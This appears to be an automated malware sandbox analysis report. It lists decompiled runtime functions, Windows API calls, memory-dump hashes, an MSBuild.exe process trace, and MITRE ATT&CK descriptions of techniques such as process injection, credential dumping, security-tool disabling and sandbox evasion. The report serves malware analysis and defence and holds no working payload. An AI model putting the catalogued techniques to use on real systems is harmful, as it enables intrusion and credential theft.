0x00000000
0x00000000
0x00d46453
0x00d46448
0x00000000
0x00d4646e
0x00d4645b
0x00d46466
0x00000000
0x00d46415
0x00d46418
0x00d4641e
0x00d4641e
0x00d4646f
0x00d46471
0x00d46402
0x00d4640c
0x00d4640c

APIs

_free.LIBCMT ref: 00D46418

Part of subcall function 00D46367: __FF_MSGBANNER.LIBCMT ref: 00D4637E
Part of subcall function 00D46367: __NMSG_WRITE.LIBCMT ref: 00D46385
Part of subcall function 00D46367: RtlAllocateHeap.NTDLL(00F90000,00000000,00000001,00000000,00000000,00000000,?,00D4436D,00000000,00000000,00000000,00000000,?,00D44222,00000018,00D511B8), ref: 00D463AA

Memory Dump Source

Source File: 00000000.00000002.353025980.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.353021820.0000000000D40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353036235.0000000000D4D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353042879.0000000000D52000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353052329.0000000000D55000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353063498.0000000000D56000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 6b4a02c59bac648c6247543719ad75c162c629fc1f696e8a8c00259d99733327
Instruction ID: 9b4641295adbed9525d782456a22fbe411f629c03c6883b8a64b2e19e5608841
Opcode Fuzzy Hash: 6b4a02c59bac648c6247543719ad75c162c629fc1f696e8a8c00259d99733327
Instruction Fuzzy Hash: 1211EC36509711AFCF202FB4BC047593795EF063A5F244525F9CED6155DB35C84086F6

Uniqueness

Uniqueness Score: -1.00%

Function 00D49DCD, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D49DCD(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00D4A31E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00D49E53(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00D4A599(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00D4A4D8(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x00d49dd0
0x00d49dd6
0x00d49e49
0x00000000
0x00d49ddd
0x00d49ddd
0x00d49de0
0x00d49dfb
0x00d49dfe
0x00d49e1e
0x00d49e30
0x00d49e00
0x00d49e00
0x00d49e03
0x00000000
0x00d49e05
0x00d49e17
0x00d49e17
0x00d49e03
0x00d49e4e
0x00d49e52
0x00d49de2
0x00d49dfa
0x00d49dfa
0x00d49de0

APIs

__cftof_l.LIBCMT ref: 00D49DF1

Part of subcall function 00D4A4D8: __fltout2.LIBCMT ref: 00D4A501

__cftog_l.LIBCMT ref: 00D49E17
__cftoe_l.LIBCMT ref: 00D49E49

Memory Dump Source

Source File: 00000000.00000002.353025980.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.353021820.0000000000D40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353036235.0000000000D4D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353042879.0000000000D52000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353052329.0000000000D55000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353063498.0000000000D56000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: fc8a8f9b3520f3c5c1c59aa609d599a0f162f5cae96687977ff0f0ee62a901b5
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 6701893204514EBBCF129E89CC268EE7F22FB09350F588428FA5858035D737C9B1ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D46D06, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00D46D06(void* __ebx, void* __ecx, void* __edx, void* __esi) {
				int __edi;
				void* _t14;
				void* _t19;
				void* _t20;
				void* _t22;
				signed int _t23;

				_t19 = __edx;
				if(__esi != 0) {
					__ebx + __ebx = E00D46DB0(__esi, __edi, __ebx + __ebx);
					__eax = MultiByteToWideChar( *(__ebp + 0x1c), 1,  *(__ebp + 0x10),  *(__ebp + 0x14), __esi, __ebx);
					if(__eax != 0) {
						__edi = __eax;
					}
					E00D46C4B(__esi) = __edi;
				}
				_pop(_t20);
				_pop(_t22);
				_pop(_t14);
				return E00D45CCB(_t14,  *(_t23 - 4) ^ _t23, _t19, _t20, _t22);
			}

0x00d46d06
0x00d46d0d
0x00d46d15
0x00d46d2a
0x00d46d32
0x00d46d42
0x00d46d42
0x00d46d4b
0x00d46d4b
0x00d46d50
0x00d46d51
0x00d46d52
0x00d46d60

APIs

_memset.LIBCMT ref: 00D46D15
MultiByteToWideChar.KERNEL32(?,00000001,?,?), ref: 00D46D2A
GetStringTypeW.KERNEL32(?,?,00000000,?), ref: 00D46D3C
__freea.LIBCMT ref: 00D46D45

Memory Dump Source

Source File: 00000000.00000002.353025980.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.353021820.0000000000D40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353036235.0000000000D4D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353042879.0000000000D52000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353052329.0000000000D55000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353063498.0000000000D56000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiStringTypeWide__freea_memset
String ID:
API String ID: 1206527432-0
Opcode ID: a85d87b015cdb6a419e5df7e3fe678cc2e472c2b1abd22bbaf57fa685e88aa4a
Instruction ID: 6918edb65879eba43ff628e303621f462cfbb71da7b69147cd9038fc8bb05616
Opcode Fuzzy Hash: a85d87b015cdb6a419e5df7e3fe678cc2e472c2b1abd22bbaf57fa685e88aa4a
Instruction Fuzzy Hash: 57F03A32601159ABDF219F50AC86DEF3F6AEF46360B040065FD0A96152DB218966DBB2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MSBuild.exe PID: 6336 Parent PID: 4388 MSBuild.exeCOMMON

Executed Functions

Function 0145AFE8, Relevance: 2.3, APIs: 1, Instructions: 760libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0145B770

Memory Dump Source

Source File: 00000002.00000002.615315367.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: be56ee8602b50964aa1a02d9c72e0b4af9260c6c6ebe2d83426ab77f1e2899d6
Instruction ID: 1729e5eb3f440e883d8c3f6ca8b80b8a5c7f7e2750581a1a40502d18a394e794
Opcode Fuzzy Hash: be56ee8602b50964aa1a02d9c72e0b4af9260c6c6ebe2d83426ab77f1e2899d6
Instruction Fuzzy Hash: 5A622B34E007198FDB64EF78C85469DB7F2AF99304F1085AAD54AAB365EF309D81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 01064F58, Relevance: 1.7, APIs: 1, Instructions: 174libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01065007

Memory Dump Source

Source File: 00000002.00000002.613772924.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4857aa75f05b6bf1cc6712324b916dbcf820ae43de5cd57c7f5819f423b25572
Instruction ID: 2e3cd47719dc05a20e43639c3801267967dae7c2641781fb83886669df1ed66a
Opcode Fuzzy Hash: 4857aa75f05b6bf1cc6712324b916dbcf820ae43de5cd57c7f5819f423b25572
Instruction Fuzzy Hash: D351C271B003059FCB15EBB4D858AAEB7FAAF94204F148569D456DB395EF30EC04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01466B1F, Relevance: 6.1, APIs: 4, Instructions: 141threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 01466BB0
GetCurrentThread.KERNEL32 ref: 01466BED
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00017588), ref: 01466C2A
GetCurrentThreadId.KERNEL32 ref: 01466C83

Memory Dump Source

Source File: 00000002.00000002.615359081.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 904ca15840e7cf60cd9e9afa18bf59ebff670d8f42ae81c8175698ee519e434b
Instruction ID: 9d25bb739176b1df5c33c34547ce488d53f56b3593f65c4277ed16b26545acae
Opcode Fuzzy Hash: 904ca15840e7cf60cd9e9afa18bf59ebff670d8f42ae81c8175698ee519e434b
Instruction Fuzzy Hash: 535196B09053888FDB14CFA9D948BDEBFF4BF49318F10809AD419A72A1CB355884CB62

Uniqueness

Uniqueness Score: -1.00%

Function 01466B50, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 01466BB0
GetCurrentThread.KERNEL32 ref: 01466BED
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00017588), ref: 01466C2A
GetCurrentThreadId.KERNEL32 ref: 01466C83

Memory Dump Source

Source File: 00000002.00000002.615359081.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 9b35c093f200f5d299eced7437033bf4f3b8500969a2eaf33022f832a12ef3a1
Instruction ID: d81558e72882e50ef260bfad66c857e832e74dfe57690c5f2d8b9f5508dcc65a
Opcode Fuzzy Hash: 9b35c093f200f5d299eced7437033bf4f3b8500969a2eaf33022f832a12ef3a1
Instruction Fuzzy Hash: 985134B0900749DFDB14CFAAD548B9EBBF5FF48318F20806AE419A7360DB756884CB65

Uniqueness

Uniqueness Score: -1.00%

Function 01062388, Relevance: 1.7, APIs: 1, Instructions: 236libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(?,?,?,?,?,?,?,?,?,?,00000000), ref: 01062471

Memory Dump Source

Source File: 00000002.00000002.613772924.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ef8b71a2bd2114effedc362fc61b4d0fd6c947474d66a6d814b08bfe1cd07f91
Instruction ID: 67a0c4477bc8e29623011bf3e11bc2162c27007e9bb370ff5780317e9db246fc
Opcode Fuzzy Hash: ef8b71a2bd2114effedc362fc61b4d0fd6c947474d66a6d814b08bfe1cd07f91
Instruction Fuzzy Hash: D9918F30A00309DBDB24EFB9D4587AEBBF6AF98348F10886CE4469B294DF359C41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0145E668, Relevance: 1.6, APIs: 1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.615315367.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 747b7f8624690dd78a38154ee38127e5e26d3af457981721e4ca0d2257702a12
Instruction ID: 249e895999e821c0550b81fa95006e7714b604705eab03e3639a4bb29086035f
Opcode Fuzzy Hash: 747b7f8624690dd78a38154ee38127e5e26d3af457981721e4ca0d2257702a12
Instruction Fuzzy Hash: 30412671D043459FCB14DFA9D8406DEFBF0AF89210F04816BD844E7251DB349945CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 01465190, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 014652A2

Memory Dump Source

Source File: 00000002.00000002.615359081.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 5249f122af39269a87d4b54f53989a0aa256752a796e3032765211c5faee468f
Instruction ID: 0bf9e5aa08f7bc79e9c14208ba4389ae329374530b1826bc96e62b7427e2f450
Opcode Fuzzy Hash: 5249f122af39269a87d4b54f53989a0aa256752a796e3032765211c5faee468f
Instruction Fuzzy Hash: 0941D0B1D10308AFDF14CF99D880ADEFBB5BF48354F24812AE819AB210D7719885CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01466964, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 01467D01

Memory Dump Source

Source File: 00000002.00000002.615359081.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: b09142f9272ebcb07a644ed0526822adfb912845fa1dbc6d757f6a906e4a0931
Instruction ID: 278e936f7bfc9cf481a49653444b344fd6efdb2948566da904dce9aa5cf6dfcd
Opcode Fuzzy Hash: b09142f9272ebcb07a644ed0526822adfb912845fa1dbc6d757f6a906e4a0931
Instruction Fuzzy Hash: 704159B59003059FCB14CF99C448BAAFBF9FB88328F148459D419AB325C734A841CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01065BA6, Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 01065C69

Memory Dump Source

Source File: 00000002.00000002.613772924.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 93c09b166aa9298953e1eb85185ff1d269d8fc0c991f5e708ba9a3fcbf4629b6
Instruction ID: ad8deecde778c19d6db8736cd2c7c8ae57bcdbaf187eedf0b46cdb6cdd618d35
Opcode Fuzzy Hash: 93c09b166aa9298953e1eb85185ff1d269d8fc0c991f5e708ba9a3fcbf4629b6
Instruction Fuzzy Hash: CA310DB1D002589FCB20CF9AC980ADEBFF5BF48360F54816AE819AB314D7319905CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01065BB0, Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 01065C69

Memory Dump Source

Source File: 00000002.00000002.613772924.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 0d060adce1b59a6297729f2c298a51c4e1e192b310af757bdda42e6f7d3c0348
Instruction ID: d575fd0ea9178f28cf6107556be0a1bd6fb163a69c16fd3671f27a11484b52c9
Opcode Fuzzy Hash: 0d060adce1b59a6297729f2c298a51c4e1e192b310af757bdda42e6f7d3c0348
Instruction Fuzzy Hash: B331F0B1D002589FCB10CF9AC984A8EFFF9BF48754F54816AE819AB304D7319945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0106593E, Relevance: 1.6, APIs: 1, Instructions: 81registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 010659FC

Memory Dump Source

Source File: 00000002.00000002.613772924.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: c6288d9effe495a809cdfc586157d0f6f3d21a727216511beab4ce24cd3c5f41
Instruction ID: 0295126f9fabb5a1531dd620113945e2b6e7dd0f92a25c8f79ecdafcfb74e35a
Opcode Fuzzy Hash: c6288d9effe495a809cdfc586157d0f6f3d21a727216511beab4ce24cd3c5f41
Instruction Fuzzy Hash: A1310EB1D013499FDB10CF98C584B8EFBF5BF48314F68816AE409AB341C7759985CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01065948, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 010659FC

Memory Dump Source

Source File: 00000002.00000002.613772924.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 4a218c0339c1d13e28da83be2dcfcfea66117198e4ed4feca0bbd017a1507b64
Instruction ID: 89ca560a410d3e6bc535335345afb2796de2e832cd9ccad5fbc580a259ec28f1
Opcode Fuzzy Hash: 4a218c0339c1d13e28da83be2dcfcfea66117198e4ed4feca0bbd017a1507b64
Instruction Fuzzy Hash: D431FDB0D013499FDB14CF99C584B8EFBF5BF48314F28816AE809AB241C7759985CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01466D78, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01466DFF

Memory Dump Source

Source File: 00000002.00000002.615359081.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0b0f0a8d949606b55dea0404a6407981452d538e03d07566df65445a28cd6c8c
Instruction ID: 1eaff0fb3a2938716356dbb26db666a69e61726eb6f7c15c534a5a2694d35c0a
Opcode Fuzzy Hash: 0b0f0a8d949606b55dea0404a6407981452d538e03d07566df65445a28cd6c8c
Instruction Fuzzy Hash: 6621D3B5900208AFDB10CFAAD984BDEFBF8FB48324F14841AE914A7350D775A954CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0145E738, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0145E6BA), ref: 0145E7A7

Memory Dump Source

Source File: 00000002.00000002.615315367.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 8166e9c99372bd369b43d10bb802f272eeddfb68ed6e03ca993d6b62befbac80
Instruction ID: e2cc5bf02a973dd08ecb7e877a9958f471b2bd45e8de1bade1388c7bd0e4b65c
Opcode Fuzzy Hash: 8166e9c99372bd369b43d10bb802f272eeddfb68ed6e03ca993d6b62befbac80
Instruction Fuzzy Hash: 482122B1C006199FCB10CF9AD4457DEFBF4BF48224F15816AD814B7240D378A955CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0145D118, Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0145E6BA), ref: 0145E7A7

Memory Dump Source

Source File: 00000002.00000002.615315367.0000000001450000.00000040.00000001.sdmp, Offset: 01450000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: a58faf41d4b98c4b85338a14c98802af3fbb4dcd335abb86fcde285fd905d967
Instruction ID: 0a28853e04b5b8619565400f401759d1051b465615443a84f11803c20cc2591c
Opcode Fuzzy Hash: a58faf41d4b98c4b85338a14c98802af3fbb4dcd335abb86fcde285fd905d967
Instruction Fuzzy Hash: 3C1142B1C006199BCB10CF9AD444BDEFBF4AF48224F04816AE818B7240D378AA50CFE5

Uniqueness

Uniqueness Score: -1.00%

Function 0146BE08, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 0146BE82

Memory Dump Source

Source File: 00000002.00000002.615359081.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 0d9b0dbee3bede007f70f0596c2e7ab90b34c71ee23099531291b9d6a8f82d34
Instruction ID: 24a86d02f952660c9a691ec5b365bbdb267d3103870aa8cd470077c2bf8864e6
Opcode Fuzzy Hash: 0d9b0dbee3bede007f70f0596c2e7ab90b34c71ee23099531291b9d6a8f82d34
Instruction Fuzzy Hash: 39119AB1A013058FDB20EFA9D80879EBBF8FB08328F10842AD508E7245C7396544CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 01462F44, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 01464216

Memory Dump Source

Source File: 00000002.00000002.615359081.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 83d44cc74787ecfbf5bc164ed95efaa767ae3a3db65fefa03ed4a0c325f7609d
Instruction ID: 7a74008a275ab7035d9872d75520e384d54e34c85454b29c37652f3ef02f4319
Opcode Fuzzy Hash: 83d44cc74787ecfbf5bc164ed95efaa767ae3a3db65fefa03ed4a0c325f7609d
Instruction Fuzzy Hash: FE1132B1D002498FDB20CF9AD444BDEFBF8FB89224F14842AD829B7210C375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 014641AB, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 01464216

Memory Dump Source

Source File: 00000002.00000002.615359081.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 8cbc2bb9a2ac4d025bc8bd0b3e84e07c95dd9f615501be2c5504816405b39475
Instruction ID: 4dcff028e0c97b1e6ddc2fdeb635aba09284f831b5716dcd627659f60b7ac12a
Opcode Fuzzy Hash: 8cbc2bb9a2ac4d025bc8bd0b3e84e07c95dd9f615501be2c5504816405b39475
Instruction Fuzzy Hash: 151120B1C002498FDB10CFAAD844BCEFBF8EF89224F14852AD428B7610C375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0106FDD8, Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32 ref: 0106FE35

Memory Dump Source

Source File: 00000002.00000002.613772924.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 8068ded8cc9e23c3f374e82a130f3d524f3924291289369ce78dc7c17a636c8e
Instruction ID: 9a8e98b6c957f9fb8d3763079998e9025a1076cbfba04c75a897c65d0b873b93
Opcode Fuzzy Hash: 8068ded8cc9e23c3f374e82a130f3d524f3924291289369ce78dc7c17a636c8e
Instruction Fuzzy Hash: A71142B19002498FDB20CFA9D884BCEFFF4AB48324F10845AE059A3600C335A544CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0106FDE0, Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32 ref: 0106FE35

Memory Dump Source

Source File: 00000002.00000002.613772924.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 2e432933a8486be0ca563e1d88897176b69aab7c1e6c5c420273884b4d92dbd7
Instruction ID: fe1c0d27d732d94a16b0fc47f8f340d4ac70de3a42e9266ed76fe642bd4c02de
Opcode Fuzzy Hash: 2e432933a8486be0ca563e1d88897176b69aab7c1e6c5c420273884b4d92dbd7
Instruction Fuzzy Hash: 531123B18003499FCB20DF9AD844BCEFFF8EB48324F108459D519A3200C375A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

